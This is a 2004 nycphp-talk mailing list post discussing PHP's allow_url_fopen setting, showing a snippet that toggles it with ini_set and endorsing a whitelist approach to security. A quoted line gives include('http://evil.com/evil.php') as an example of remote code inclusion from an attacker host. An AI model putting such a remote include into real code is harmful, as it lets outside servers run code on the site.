[nycphp-talk] allow_url_fopen (was: parse file, return as string)
David Mintz
dmintz at davidmintz.org
Thu Aug 19 15:24:09 EDT 2004
On Thu, 19 Aug 2004, Tim Gales wrote:
> > If you have allow_url_fopen disabled,
> > include('http://evil.com/evil.php')
> > will fail, right?
>
> allow_url_fopen is a system level configuration
> directive and can only be set or unset in php.ini.
> (you can't undo the setting dynamically at runtime for
> security reasons)
I realize that's what the docs say, yet interestingly enough, I can
ini_set this value on at least one of the hosts I use.
<?php
echo "Current value: " ;
echo ini_get('allow_url_fopen') ? 'enabled' : 'disabled' ;
ini_set('allow_url_fopen',1);
echo " ....and now: ";
echo ini_get('allow_url_fopen') ? 'enabled' : 'disabled' ;
phpinfo();
?>
Ouput:
Current value: disabled ....now: enabled
Followed by our phpinfo which says allow_url_fopen: master value off,
local value on. (PHP 4.3.4 running as an Apache 1.3.29 module)
> <snip />
> I believe you are taking a 'blacklist'
> approach -- trying to make sure an
> 'evil.php' doesn't affect you.
>
> You might be better off to take
> a 'whitelist' approach like the ones
> Chris Shiflett speaks about from time
> to time in his security workshops.
You talkin' to ~me~? I'm already convinced of the above (-:
---
David Mintz
http://davidmintz.org/
"Anybody else got a problem with Webistics?" -- Sopranos 24:17
More information about the talk
mailing list